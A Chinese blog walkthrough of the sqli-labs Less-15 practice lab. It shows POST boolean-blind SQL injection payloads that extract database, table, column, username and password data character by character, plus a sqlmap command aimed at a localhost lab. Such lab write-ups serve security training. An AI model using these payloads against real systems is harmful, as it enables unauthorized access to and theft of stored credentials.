sqli-labs-less-15 post布尔盲注+sqlmap爆破

Less-15

方法一:
Post传参,先用burp suite抓包
在这里插入图片描述

判断闭合方式:

uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’
在这里插入图片描述

uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。
在这里插入图片描述

Substr(a,b,c):从位置b开始截取a字符中的前c个字符

判断当前数据库名长度:

uname=’ or length(database())>0 #&passwd=&submit=Submit

判断数据库名:

先猜解第一个字母:
uname=’ or ascii(substr(database(),1,1))>100 #&passwd=&submit=Submit
第二个字母:
uname=’ or ascii(substr(database(),2,1))>100 #&passwd=&submit=Submit

猜解security库中的表名:

第一个表名的第一个字母:
uname=’ or ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))>100 #&passwd=&submit=Submit

猜解users表中的字段:

第一个字段的第一个字母:
uname=’ or ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))>100 #&passwd=&submit=Submit

猜解username字段中信息:

第一个信息:
uname=’ or ascii(substr((select username from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit

猜解password字段中的信息:

uname=’ or ascii(substr((select password from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit

方法二:

使用sqlmap进行爆破:

使用burp suite抓包之后,得到post传参方法,利用sqlmap进行爆破:
使用命令:
sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-15/” --data “uname=1&passwd=&submit=Submit” -f --banner –dbs
开始爆破:

得到banner信息:

在这里插入图片描述

得到数据库:

在这里插入图片描述

并且得到后台数据库的信息已经保存:
在这里插入图片描述

持续更新。。。。。。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值